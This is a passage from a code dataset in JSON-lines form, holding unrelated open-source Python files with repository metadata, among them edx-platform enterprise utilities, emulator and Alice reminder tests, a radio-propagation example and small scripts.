enterprise_customer_uuid\n\n queryset = EnterpriseCustomerUser.objects.filter(**kwargs).prefetch_related(\n 'enterprise_customer',\n 'enterprise_customer__branding_configuration',\n )\n\n if not enterprise_customer_uuid:\n # If the request doesn't help us know which Enterprise Customer UUID to select with,\n # order by the most recently activated/modified customers,\n # so that when we select the first result of the query as the preferred\n # customer, it's the most recently active one.\n queryset = queryset.order_by('-enterprise_customer__active', '-modified')\n\n preferred_enterprise_customer_user = queryset.first()\n if not preferred_enterprise_customer_user:\n return None\n\n enterprise_customer = preferred_enterprise_customer_user.enterprise_customer\n learner_portal_data = {\n 'name': enterprise_customer.name,\n 'slug': enterprise_customer.slug,\n 'logo': enterprise_branding_configuration(enterprise_customer).get('logo'),\n }\n\n # Cache the result in the user's request session\n request.session[learner_portal_session_key] = json.dumps(learner_portal_data)\n return learner_portal_data\n return None\n\n\ndef enterprise_branding_configuration(enterprise_customer_obj):\n \"\"\"\n Given an instance of ``EnterpriseCustomer``, returns a related\n branding_configuration serialized dictionary if it exists, otherwise\n the serialized default EnterpriseCustomerBrandingConfiguration object.\n\n EnterpriseCustomerBrandingConfigurationSerializer will use default values\n for any empty branding config fields.\n \"\"\"\n branding_config = enterprise_customer_obj.safe_branding_configuration\n return EnterpriseCustomerBrandingConfigurationSerializer(branding_config).data\n\n\ndef get_enterprise_learner_generic_name(request):\n \"\"\"\n Get a generic name concatenating the Enterprise Customer name and 'Learner'.\n\n ENT-924: Temporary solution for hiding potentially sensitive SSO names.\n When a more complete solution is put in place, delete this function and all of its uses.\n \"\"\"\n # Prevent a circular import. This function makes sense to be in this module though. And see function description.\n from openedx.features.enterprise_support.api import enterprise_customer_for_request\n\n # ENT-2626: For 404 pages we don't need to perform these actions.\n if getattr(request, 'view_name', None) == '404':\n return\n\n enterprise_customer = enterprise_customer_for_request(request)\n\n return (\n enterprise_customer['name'] + 'Learner'\n if enterprise_customer and enterprise_customer['replace_sensitive_sso_username']\n else ''\n )\n\n\ndef is_enterprise_learner(user):\n \"\"\"\n Check if the given user belongs to an enterprise. Cache the value if an enterprise learner is found.\n\n Arguments:\n user (User): Django User object or Django User object id.\n\n Returns:\n (bool): True if given user is an enterprise learner.\n \"\"\"\n # Prevent a circular import.\n from openedx.features.enterprise_support.api import enterprise_enabled\n\n if not enterprise_enabled():\n return False\n\n try:\n user_id = int(user)\n except TypeError:\n user_id = user.id\n cached_is_enterprise_key = get_is_enterprise_cache_key(user_id)\n if cache.get(cached_is_enterprise_key):\n return True\n\n if EnterpriseCustomerUser.objects.filter(user_id=user_id).exists():\n # Cache the enterprise user for one hour.\n cache.set(cached_is_enterprise_key, True, 3600)\n return True\n\n return False\n\n\ndef get_enterprise_slug_login_url():\n \"\"\"\n Return the enterprise slug login's URL (enterprise/login) if it exists otherwise None\n \"\"\"\n try:\n return reverse('enterprise_slug_login')\n except NoReverseMatch:\n return None\n\n\ndef get_provider_login_url(request, provider_id, redirect_url=None):\n \"\"\"\n Return the given provider's login URL.\n\n This method is here to avoid the importing of pipeline and student app in enterprise.\n \"\"\"\n\n provider_login_url = third_party_auth.pipeline.get_login_url(\n provider_id,\n third_party_auth.pipeline.AUTH_ENTRY_LOGIN,\n redirect_url=redirect_url if redirect_url else get_next_url_for_login_page(request)\n )\n return provider_login_url\n\n\ndef fetch_enterprise_customer_by_id(enterprise_uuid):\n return EnterpriseCustomer.objects.get(uuid=enterprise_uuid)\n\n\ndef is_course_accessed(user, course_id):\n \"\"\"\n Check if the learner accessed the course.\n\n Arguments:\n user (User): Django User object.\n course_id (String): The course identifier\n\n Returns:\n (bool): True if course has been accessed by the enterprise learner.\n \"\"\"\n try:\n get_key_to_last_completed_block(user, course_id)\n return True\n except UnavailableCompletionData:\n return False\n","repo_name":"openedx/edx-platform","sub_path":"openedx/features/enterprise_support/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19632,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"31563718290","text":"\nfrom pypy.lang.gameboy.interrupt import *\nfrom pypy.lang.gameboy import constants\n\ndef get_interrupt():\n return Interrupt()\n\n\n\ndef test_reset():\n interrupt = get_interrupt()\n assert interrupt.enable == 0\n assert interrupt.get_interrupt_flag() == 0xE0 | constants.VBLANK\n interrupt.enable = 1\n interrupt.flag = ~constants.VBLANK\n interrupt.reset()\n assert interrupt.enable == 0\n assert interrupt.get_interrupt_flag() == 0xE0 | constants.VBLANK\n \n \ndef test_is_pending():\n interrupt = get_interrupt()\n assert interrupt.is_pending() == False\n assert interrupt.is_pending(0x00) == False\n interrupt.set_interrupt_enable(True)\n assert interrupt.is_pending()\n \n \ndef test_is_pending_common_masks():\n interrupt = get_interrupt()\n for flag in interrupt.interrupt_flags:\n interrupt.reset()\n interrupt.enable = True\n assert interrupt.v_blank.is_pending()\n flag.set_pending(True)\n assert interrupt.is_pending(flag.mask)\n \n \ndef test_raise_lower_interrupt():\n interrupt = get_interrupt()\n masks= [constants.LCD, constants.TIMER, \n constants.JOYPAD, constants.SERIAL]\n interrupt.set_interrupt_enable(True)\n interrupt.v_blank.set_pending(True)\n for mask in masks:\n interrupt.raise_interrupt(mask)\n assert interrupt.mask_mapping[mask].is_pending() == True\n assert interrupt.is_pending(mask) == True\n interrupt.lower(mask)\n assert interrupt.is_pending(mask) == False\n \ndef test_read_write():\n interrupt = get_interrupt()\n value = 1\n interrupt.write(constants.IE, value)\n assert interrupt.enable == value\n assert interrupt.read(constants.IE) == value\n \n interrupt.reset()\n value = constants.LCD\n interrupt.write(constants.IF, value)\n assert interrupt.get_interrupt_flag() == 0xE0 | value\n assert interrupt.read(constants.IF) == 0xE0 | value\n","repo_name":"camillobruni/pygirl","sub_path":"pypy/lang/gameboy/test/test_interrupt.py","file_name":"test_interrupt.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"}
+{"seq_id":"30429334530","text":"__version__ = '1.0'\n__license__ = \"EPL 1\"\n__author__ = [ 'Eing Ong @eingong' ]\n\nimport os\n\nclass testEnv:\n \"\"\" Reads in environment variables used in tests. \n Examples:\n MOET - /Users//moet\n MOET_DEVICE - bb8130/bb9550/android/iphone\n MOET_OS - 5.0.0/2.2/4.2\n MOET_RESOLUTION - 240x320/320x480/480x800\n MOET_RESULTS - $MOET/results\n MOET_MODE - CAPTURE/TEST/DEMO\n IMAGE_TOOL (if not in system PATH)\n \"\"\"\n\n runOptionList = ('CAPTURE', 'TEST', 'DEMO')\n\n def __init__(self):\n self.devicePin = os.getenv('DEVICE_PIN')\n self.devicePort = os.getenv('DEVICE_PORT')\n self.rimHome = os.getenv('RIM_HOME')\n self.version = os.getenv('Version')\n self.imageTool = os.getenv('IMAGE_TOOL')\n self.testroot = os.getenv('MOET')\n if not self.testroot is None:\n self.resources = os.path.join(self.testroot, 'resources')\n self.mobileDevice = os.getenv('MOET_DEVICE')\n if not self.mobileDevice is None:\n self.fullDevice = self.mobileDevice\n self.mobileDevice = self.mobileDevice.lower()\n self.resources = os.path.join(self.resources, self.mobileDevice)\n self.deviceOS = os.getenv('MOET_OS')\n if not self.deviceOS is None:\n self.fullDevice = self.fullDevice + '-' + self.deviceOS \n self.runOption = os.getenv('MOET_MODE')\n self.orientation = os.getenv('ORIENTATION')\n self.testoutput = os.getenv('MOET_RESULTS')\n self.res = os.getenv('MOET_RESOLUTION')\n if not self.res is None:\n self.resX = self.res.split('x')[0]\n self.resY = self.res.split('x')[1]\n if not self.res is None:\n self.resources = os.path.join(self.resources, self.res)\n\n def setDeviceOS(self, deviceOS):\n self.deviceOS = deviceOS\n\n def getResolution(self):\n return self.res\n\n def getFullDevice(self):\n return self.fullDevice\n\n def getImageTool(self):\n return self.imageTool\n\n def getRunOption(self):\n if isinstance(self.runOption, str) == False or self.runOption == '':\n self.runOption = self.runOptionList[1] \n return self.runOption.upper()\n\n def setRunOption(self, runOption):\n if isinstance(runOption, str) == False or self.runOption == '':\n self.runOption = self.runOptionList[1] \n self.runOption = runOption\n\n def getMobileDevice(self):\n return self.mobileDevice\n\n def getSimulatorHome(self):\n return self.simulatorHome\n\n def getTestRoot(self):\n return self.testroot\n\n def getTestOutput(self):\n return self.testoutput\n\n def getDeviceClass(self):\n \"\"\" Returns the device to test \"\"\"\n mobileDevice = self.getMobileDevice()\n\n if mobileDevice == 'android':\n import android \n deviceClass = android.AndroidImpl()\n elif mobileDevice == 'iphone':\n import iphone \n deviceClass = iphone.iPhoneImpl()\n elif mobileDevice == 'pearl':\n import pearl \n deviceClass = pearl.PearlImpl()\n elif mobileDevice == 'storm':\n import storm\n deviceClass = storm.StormImpl()\n else:\n import bb\n deviceClass = bb.BlackBerryImpl()\n return deviceClass\n\n def updateEnv(self, variable, value):\n \"\"\" Update existing environment variable with value \"\"\"\n\n keys = os.environ.keys()\n from re import search\n for key in keys:\n if not search(variable, key):\n os.environ[variable]=value\n \n\n\"\"\" Create an instance of settings \"\"\"\nsettings = testEnv()\n","repo_name":"eing/moet","sub_path":"common/testlib.py","file_name":"testlib.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"3"}
+{"seq_id":"5075073008","text":"# paraPropPython time-dependent signal example use of paraPropPython.py notebook\n# s. prohira, c. sbrocco\n\nimport paraPropPython as ppp\nfrom receiver import receiver\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport util as util\nimport time\n\n##### time-dependent example #####\n\n### first, initialize an instance of paraProp by defining its dimensions and frequency of interest ###\niceDepth = 200. # m\niceLength = 100. # m\ndx = 1 # m\ndz = 0.05 # m\n\nfreq = 0.15\n\n### it is useful to set the reference depth as the source depth when you only have one transmitter ###\nsourceDepth = 30. # m\nsim = ppp.paraProp(iceLength, iceDepth, dx, dz, refDepth=sourceDepth, airHeight=1)\n\ndef southpole(z):\n A=1.78\n B=-0.43\n C=-0.0132\n return A+B*np.exp(C*z)\nsim.set_n(nFunc=southpole)\n\nsim.set_dipole_source_profile(freq, sourceDepth)\n\n### set a td signal ###\ndt = 1\nimpulse = np.zeros(2**8, dtype='complex')\nimpulse[10] = 1+0j\nsig = util.normToMax(util.butterBandpassFilter(impulse, 0.09, 0.25, 1/dt, 4))\nsim.set_td_source_signal(sig, dt)\n\nrxList = [receiver(100, 25)]\ntic = time.perf_counter()\n### run the solver ###\nsim.do_solver(rxList)\ntoc = time.perf_counter()\nprint(f\"Time: {toc-tic:0.4} seconds\")\n\nrx = rxList[0]\nt = rx.get_time()\nsig = rx.get_signal().real\nf = rx.get_frequency()\nspec = rx.get_spectrum()\n\nwrapped = np.roll(sig, -np.argmax(sig)+45)\nplt.plot(t, wrapped/max(wrapped))\nplt.xlabel(\"Time (ns)\")\nplt.ylabel(\"Field (norm.)\")\nplt.show()\nplt.plot(f, abs(spec)) \nplt.xlabel(\"Frequency (GHz)\")\nplt.ylabel(\"Mag. (abs)\")\n#plt.xlim(0,0.5)\nplt.show()","repo_name":"prchyr/paraPropPython","sub_path":"td.py","file_name":"td.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"18128871065","text":"from collections import Counter\n\nt = int(input())\nans = []\nfor i in range(t):\n was = set()\n temp = int(input())\n word = input()\n tr = True\n\n for ch in word:\n if ch not in was:\n was.add(ch)\n last_added = ch\n elif ch in was and ch == last_added:\n continue\n else:\n tr = False\n\n if tr:\n ans.append(\"YES\")\n else:\n ans.append(\"NO\")\n\nfor i in ans:\n print(i)\n","repo_name":"TOOFACK/DailyCodingPy","sub_path":"CF/719(Div3)/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71989221842","text":"import re\npattern='([0-9,D,T,A][a,m,h,s,c]){1}'\nmusiques=['1a0a(14)3aDa1a1aDa(13)1a','Da6a4a8a0a7a9aDa1a2a','6h9h4h(15)4s1hAs2s1h']\n\nprog = re.compile(pattern,flags=re.IGNORECASE)\nresult = prog.findall(musiques[2])\n\nfor group in result:\n print(group)\nprint('head')\n","repo_name":"jcambert/pmu_scrapper","sub_path":"musique.py","file_name":"musique.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71817264083","text":"import unittest\nfrom hexagonal.apps.backend.public.app import app, db\n\nclass UnitTestBase(unittest.TestCase):\n\n def setUp(self):\n self.app = app.test_client()\n\n def assertResponse(self, endpoint: str, expectedStatusCode: int, expectedResponse):\n response = self.app.get(endpoint, headers={\"Content-Type\": \"application/json\"})\n\n self.assertEqual(expectedStatusCode, response.status_code)\n self.assertEqual(expectedResponse, response.json)\n \n def assertRequestWithBody(self, endpoint: str, body, expectedStatusCode: int):\n response = self.app.put(\n endpoint,\n headers={\"Content-Type\": \"application/json\"},\n data=body\n )\n\n self.assertEqual(expectedStatusCode, response.status_code)\n self.assertEqual(None, response.json)\n \n def tearDown(self):\n with app.app_context():\n db.session.execute(\"DELETE FROM services\")\n db.session.commit()","repo_name":"olimacorot/python-hexagonal","sub_path":"tests/apps/backend/unit_test_base.py","file_name":"unit_test_base.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31033306617","text":"\"\"\"\nПример программы для работы с ООП\n\nСделать\n- добавить метод для вывода сообщений с префиксом имени\n- добавить метод для вывода информации об объекте\n- добавить конструктор класса для формирования полей\n\"\"\"\n\n\nclass Person:\n name: str\n surname: str\n age: int\n\n def __init__(self, first_name: str, last_name: str, age: int = 0):\n self.name = first_name\n self.surname = last_name\n self.age = age\n\n def info(self):\n print(f\"Объект класса Person: {self.name} {self.surname}, age: {self.age}\")\n\n def say_as(self, message):\n return f\"<{self.name}> {message}\"\n\n\nperson1 = Person('John', 'Doe', 43)\n\nprint(person1.name)\n\n\nperson2 = Person('John', 'Doe', 43)\n\nperson2.info()\n","repo_name":"onlycska/Messenger","sub_path":"src/day_02/01_person_methods.py","file_name":"01_person_methods.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37440424016","text":"from intent import Intent, IntentName\nfrom typing import Optional\nimport discord\nimport random\n\nfrom handlers.handler import MessageHandler\n\n\nclass PlayAmongUs(MessageHandler):\n \"\"\"\n Respond cheeky messages to people who want to play Among Us\n \"\"\"\n\n def __init__(self):\n super().__init__(channels=[\"among-us\"], intent_names=[IntentName.play_among_us])\n\n def handle(self, message: discord.Message, intent: Intent) -> Optional[str]:\n if intent.probability > 0.9:\n return random.choice(\n [\n f\"{message.author.display_name} sus\",\n \"Seems like the perfect time to play among us\",\n \"Tell me more 🤔\",\n \"I wish I could 😞\",\n \"Beanie gang 4 lyfe\",\n \"We won't take no for an answer!\",\n ]\n )\n else:\n return None\n\n","repo_name":"schiegl/tuwien-ds-discord-bot","sub_path":"handlers/play_among_us.py","file_name":"play_among_us.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"11638385172","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport opengate as gate\nfrom opengate.tests import utility\nimport os\nimport subprocess\n\nif __name__ == \"__main__\":\n paths = utility.get_default_test_paths(__file__, \"\", output_folder=\"test032\")\n\n is_ok = True\n\n # test 1 = 10mm and with shell\n f1 = paths.output / \"iec_10mm.mhd\"\n f2 = paths.output / \"iec_source_10mm.mhd\"\n path_voxelize_script = os.path.join(\n os.path.dirname(__file__), \"..\", \"..\", \"bin\", \"voxelize_iec_phantom\"\n )\n cmd = (\n f\"python {path_voxelize_script} -o {f1} \"\n f\"-s 10 \"\n f\"--output_source {f2} \"\n f\"-a 666 555 444 333 222 111 \"\n )\n print(cmd)\n # r = os.system(f\"{cmd}\")\n subprocess.call(cmd.split())\n\n # if r != 0:\n # is_ok = False\n\n # test 2 = 9mm and without shell\n f3 = paths.output / \"iec_9mm.mhd\"\n f4 = paths.output / \"iec_source_9mm.mhd\"\n cmd = (\n f\"python {path_voxelize_script} -o {f3} \"\n f\"-s 9 \"\n f\"--output_source {f4} \"\n f\"-a 111 222 333 444 555 666 \"\n f\"--no_shell \"\n )\n print(cmd)\n # r = os.system(f\"{cmd}\")\n subprocess.call(cmd.split())\n # if r != 0:\n # is_ok = False\n\n # compare images\n gate.exception.warning(\"\\nDifference with ref image\")\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"iec_10mm.mhd\", f1, stats=None, tolerance=0.001\n )\n and is_ok\n )\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"iec_source_10mm.mhd\", f2, stats=None, tolerance=0.001\n )\n and is_ok\n )\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"iec_9mm.mhd\", f3, stats=None, tolerance=0.001\n )\n and is_ok\n )\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"iec_source_9mm.mhd\", f4, stats=None, tolerance=0.001\n )\n and is_ok\n )\n utility.test_ok(is_ok)\n","repo_name":"OpenGATE/opengate","sub_path":"opengate/tests/src/test032_voxelized_volume_source.py","file_name":"test032_voxelized_volume_source.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"3"}
+{"seq_id":"71530649043","text":"from datetime import datetime, timedelta\n\nscores = [\n 'complete blackout',\n 'incorrect response; the correct one remembered',\n 'incorrect response; where the correct one seemed easy to recall',\n 'correct response recalled with serious difficulty',\n 'correct response after a hesitation',\n 'perfect response'\n]\n\n\nclass Card(object):\n def __init__(self, idx, question, answer, first_practice, next_practice,\n streak, interval, easiness):\n self.idx = idx\n self.question = question\n self.answer = answer\n self.first_practice = first_practice\n self.next_practice = next_practice\n self.streak = int(streak) if streak else 0\n self.interval = float(interval) if interval else 1\n self.easiness = float(easiness) if easiness else 2.5\n self.question_picture = None\n self.answer_picture = None\n\n def update(self, score):\n if score < 3:\n self.streak = 0\n else:\n self.streak += 1\n\n self.easiness = max(\n 1.3, self.easiness + 0.1 - (5.0 - score) * (0.08 + (5.0 - score) * 0.02))\n\n if self.streak == 0:\n self.interval = 0\n elif self.streak == 1:\n self.interval = 1\n elif self.streak == 2:\n self.interval = 4\n else:\n self.interval = self.interval * self.easiness\n\n if not self.first_practice:\n self.first_practice = datetime.now().isoformat()\n\n self.next_practice = (\n datetime.now() + timedelta(days=self.interval)).isoformat()\n","repo_name":"gnvk/script.remember.everything","sub_path":"resources/lib/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"33469733771","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Task:Mutiple Regression on data for India and Pakistan\n#Program By:Ayush Pandey\n#Email Id:1805290@kiit.ac.in\n#DATE:19-Oct-2021\n#Python Version:3.7\n#CAVEATS:None\n#LICENSE:None\n\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# In[3]:\n\n\n#For reading the csv file\ndf=pd.read_csv('data_2.csv')\n\n\n# In[4]:\n\n\ndf.head()\n\n\n# In[5]:\n\n\n#Comparing the Death of India and Pakistan based on Unsafe water source,Unsafe sanitation,No access to handwashing facility\ndf1=df.groupby(['Entity'],as_index=False).agg({'Unsafe water source':'sum','Unsafe sanitation':'sum','No access to handwashing facility':'sum'})\n\n\n# In[6]:\n\n\n#Storing all the data's where Entity is India and Pakistan\nIndia=df1[df1['Entity']=='India']\nPakistan=df1[df1['Entity']=='Pakistan']\n\n\n# In[7]:\n\n\nx=['Unsafe water source','Unsafe sanitation','No access to handwashing facility']\ny=[India['Unsafe water source'].item(),India['Unsafe sanitation'].item(),India['No access to handwashing facility'].item()]\ny1=[Pakistan['Unsafe water source'].item(),Pakistan['Unsafe sanitation'].item(),Pakistan['No access to handwashing facility'].item()]\nX_axis = np.arange(len(x))\nplt.bar(X_axis - 0.2,y,0.4,label=\"India\")\nplt.bar(X_axis + 0.2,y1,0.4,color=\"red\",label=\"Palkistan\")\nplt.xticks(rotation=90)\nplt.xlabel(['Unsafe water source','Unsafe sanitation','No access to handwashing facility'])\nplt.ylabel(\"No. of Death\")\nplt.legend()\nplt.show()\n\n\n# In[8]:\n\n\nIndia=df[df['Entity']=='India']\nPakistan=df[df['Entity']=='Pakistan']\n\n\n# In[9]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[10]:\n\n\n#For India Doing Mutiple regression\n#Independent\nx=India[['Unsafe water source','Unsafe sanitation']]\n#Depenent\ny=India['No access to handwashing facility']\nmodel=LinearRegression()\nmodel.fit(x,y)\nprint(model.score(x,y)*100)\nprint(model.coef_)\n\n#This shows that the Unsafe water souce is the main cause for no access to handwashing facility as the coefficient value is more than 50%.\n\n\n# In[11]:\n\n\n#For Pakistan Doing Mutiple regression\n#Independent\nx=Pakistan[['Unsafe water source','Unsafe sanitation']]\n#Depenent\ny=Pakistan['No access to handwashing facility']\nmodel=LinearRegression()\nmodel.fit(x,y)\nprint(model.score(x,y)*100)\nprint(model.coef_)\n\n#This shows that the Unsafe sanitation souce is the main cause for no access to handwashing facility as the coefficient value is around 40%.\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AyushPandey141/PythonTasks","sub_path":"Day15_MutipleRegression/MutipleRegression.py","file_name":"MutipleRegression.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29035820297","text":"import re\n\nimport alice.tests.library.auth as auth\nimport alice.tests.library.intent as intent\nimport alice.tests.library.surface as surface\nimport alice.tests.library.scenario as scenario\nimport pytest\nfrom alice.tests.library.vins_response import action, DivWrapper, DivIterableWrapper\nfrom cached_property import cached_property\n\n\nclass Memento(object):\n def __init__(self, alice, cleanup):\n self._alice = alice\n self._cleanup = cleanup\n\n def create_new(self, text):\n response = self._alice(text)\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n\n schedule_directive = None\n memento_directive = None\n\n for d in response.voice_response.uniproxy_directives:\n if 'context_save_directive' in d:\n schedule_directive = d.context_save_directive\n break\n\n for d in response.voice_response.directives:\n if d.name == 'update_memento':\n memento_directive = d\n\n assert schedule_directive is not None\n assert memento_directive is not None\n\n if self._cleanup:\n self._cleanup.add(schedule_directive)\n\n return response\n\n\n@pytest.fixture\ndef cleanup_reminder():\n class RemindersCleanup(object):\n def __init__(self):\n self._reminders = []\n\n def add(self, directive):\n self._reminders.append(directive.payload.Spec.Action.SendTechnicalPush.TechnicalPush.SpeechKitDirective.payload.typed_semantic_frame.reminders_on_shoot_semantic_frame.id.string_value)\n\n def clean(self):\n # TODO (petrk) Write cleanup here.\n pass\n\n reminders = RemindersCleanup()\n yield reminders\n reminders.clean()\n\n\nclass ReminderResponse(object):\n WhatTime = r'На какое время поставить напоминание\\?'\n WhatSubject = r'(О чём|Что).* напомнить\\?'\n\n\nclass RemindersCard(DivWrapper):\n class _Reminders(DivIterableWrapper):\n class _Item(DivWrapper):\n @action\n def cancel(self):\n return self.cancel_action\n\n def __init__(self, data):\n assert data.log_id == 'reminders_card'\n super().__init__(data.reminders_card)\n\n @property\n def header(self):\n assert self.card_items[0].type == 'reminders_header'\n return self.card_items[0].title\n\n @cached_property\n def reminders(self):\n return RemindersCard._Reminders(self.card_items[1:])\n\n\n@pytest.mark.supported_features('supports_device_local_reminders')\n@pytest.mark.parametrize('surface', [surface.searchapp])\nclass TestLocalReminders(object):\n owners = ('petrk', )\n\n def test_create(self, alice):\n response = alice('поставь напоминание поесть завтра в 8:00')\n assert response.scenario == scenario.Reminders\n assert response.text.lower() == 'вы успешно поставили напоминание \"поесть\" на завтра в 8 часов утра.'\n\n @pytest.mark.unsupported_features('div2_cards')\n def test_list_without_div2_cards(self, alice):\n response = alice('поставь напоминание поесть на завтра в 3 часа дня')\n assert response.scenario == scenario.Reminders\n\n response = alice('покажи список напоминаний')\n assert response.scenario == scenario.Vins\n assert response.intent == intent.ListReminders\n assert 'установлено только одно' in response.text\n assert 'поесть на завтра' in response.text\n\n @pytest.mark.supported_features('div2_cards')\n def test_list_with_div2_cards(self, alice):\n response = alice('поставь напоминание поесть на завтра в 3 часа дня.')\n assert response.scenario == scenario.Reminders\n\n response = alice('поставь напоминание покормить кота на завтра в пять вечера.')\n assert response.scenario == scenario.Reminders\n\n response = alice('покажи список напоминаний.')\n assert response.scenario == scenario.Vins\n assert response.intent == intent.ListReminders\n\n card = RemindersCard(response.div_card)\n assert len(card.reminders) == 2\n\n reminder = card.reminders[0]\n assert reminder.title == 'Поесть'\n assert reminder.description == 'завтра в 3 часа дня'\n assert reminder.cancel_action\n\n reminder = card.reminders[1]\n assert reminder.title == 'Покормить кота'\n assert reminder.description == 'завтра в 5 вечера'\n assert reminder.cancel_action\n\n def test_cancel_after_set(self, alice):\n response = alice('поставь напоминание поесть на завтра в 3 часа дня.')\n assert response.scenario == scenario.Reminders\n\n response = alice('поставь напоминание покормить кота на завтра в пять вечера.')\n assert response.scenario == scenario.Reminders\n\n response = alice('удали')\n assert 'успешно' in response.text\n assert 'удалил' in response.text\n\n def test_cancel_by_number_voice(self, alice):\n commands = [\n 'поставь напоминание поесть на завтра в 3 часа дня.',\n 'поставь напоминание покормить котика завтра в час дня.',\n 'поставь напоминание покумекать послезавтра в 15:00.',\n ]\n\n for command in commands:\n response = alice(command)\n assert response.scenario == scenario.Reminders\n\n response = alice('покажи список напоминаний.')\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n\n # это \"покормить котика\" в 13 часов.\n response = alice('удали второе')\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n text = response.text.lower()\n for word in ['удалил', 'покормить котика', 'завтра', '13']:\n assert word in text\n\n @pytest.mark.supported_features('div2_cards')\n def test_cancel_by_number_button(self, alice):\n commands = [\n 'поставь напоминание поесть на завтра в 3 часа дня.',\n 'поставь напоминание покормить котика завтра в час дня.',\n 'поставь напоминание покумекать послезавтра в 15:00.',\n ]\n\n for command in commands:\n response = alice(command)\n assert response.scenario == scenario.Reminders\n\n response = alice('покажи список напоминаний.')\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n\n card = RemindersCard(response.div_card)\n response = alice.click(card.reminders[0].cancel())\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n text = response.text.lower()\n for word in ['удалил', 'поесть', 'завтра', '15']:\n assert word in text\n\n\n@pytest.mark.oauth(auth.Yandex)\n@pytest.mark.supported_features('notifications')\n@pytest.mark.parametrize('surface', [surface.station, surface.loudspeaker])\nclass TestMementoReminders(object):\n owners = ('petrk', )\n\n def test_set(self, alice, cleanup_reminder):\n Memento(alice, cleanup_reminder).create_new('поставь напоминение поесть на завтра в 15:00')\n\n def test_cancel_after_set(self, alice, cleanup_reminder):\n Memento(alice, cleanup_reminder).create_new('поставь напоминение поесть на завтра в 15:00')\n\n response = alice('отмени это напоминание')\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n assert 'отменила' in response.text.lower()\n\n assert len(response.voice_response.uniproxy_directives) == 1\n assert 'context_save_directive' in response.voice_response.uniproxy_directives[0]\n\n assert len(response.voice_response.directives) == 1\n assert 'update_memento' == response.voice_response.directives[0].name\n\n @pytest.mark.xfail(reason='Допилить когда юзера будут')\n def test_cancel_after_list(self, alice, cleanup_reminder):\n commands = [\n 'поставь напоминание поесть на завтра в 3 часа дня.',\n 'поставь напоминание покормить котика завтра в час дня.',\n 'поставь напоминание покумекать послезавтра в 15:00.',\n ]\n\n memento = Memento(alice, cleanup_reminder)\n for command in commands:\n memento.create_new(command)\n\n def test_list(self, alice, cleanup_reminder):\n commands = [\n 'поставь напоминание поесть на завтра в 3 часа дня.',\n 'поставь напоминание покормить котика завтра в час дня.',\n 'поставь напоминание покумекать послезавтра в 15:00.',\n ]\n\n memento = Memento(alice, cleanup_reminder)\n for command in commands:\n memento.create_new(command)\n\n response = alice('покажи список напоминаний')\n\n assert response.text.lower().find('сейчас установлено') != -1\n\n \"\"\"\n card = RemindersCard(response.div_card)\n assert len(card.reminders) == 3\n reminder = card.reminders[0]\n assert reminder.title == 'Поесть'\n assert reminder.description == 'завтра в 3 часа дня'\n assert reminder.cancel_action\n\n reminder = card.reminders[1]\n assert reminder.title == 'Покормить кота'\n assert reminder.description == 'завтра в 5 вечера'\n assert reminder.cancel_action\n \"\"\"\n\n\n@pytest.mark.xfail(reason='Эти тесты старых ремайндеров, их надо перенести, но сейчас такой возможности нет т.к. сейчас ремайндеры копяться у пользователя, ждем отдельных юзеров')\n@pytest.mark.oauth(auth.Yandex)\n@pytest.mark.parametrize('surface', [surface.station, surface.loudspeaker])\nclass TestReminders(object):\n owners = ('petrk', )\n\n def test_reminder_ellipsis_time(self, alice):\n response = alice('напомни приготовить ужин')\n assert response.intent == intent.CreateReminder\n assert re.fullmatch(ReminderResponse.WhatTime, response.text)\n\n response = alice('на завтра в 19 часов')\n assert response.intent == intent.CreateReminderEllipsis\n assert response.text == 'Поставила напоминание \\\"приготовить ужин\\\" на завтра в 19:00.'\n\n def test_reminder_ellipsis_what(self, alice):\n response = alice('поставь напоминание на завтра на 20 часов')\n assert response.intent == intent.CreateReminder\n assert re.fullmatch(ReminderResponse.WhatSubject, response.text)\n\n response = alice('приготовить ужин')\n assert response.intent == intent.CreateReminderEllipsis\n assert response.text == 'Поставила напоминание 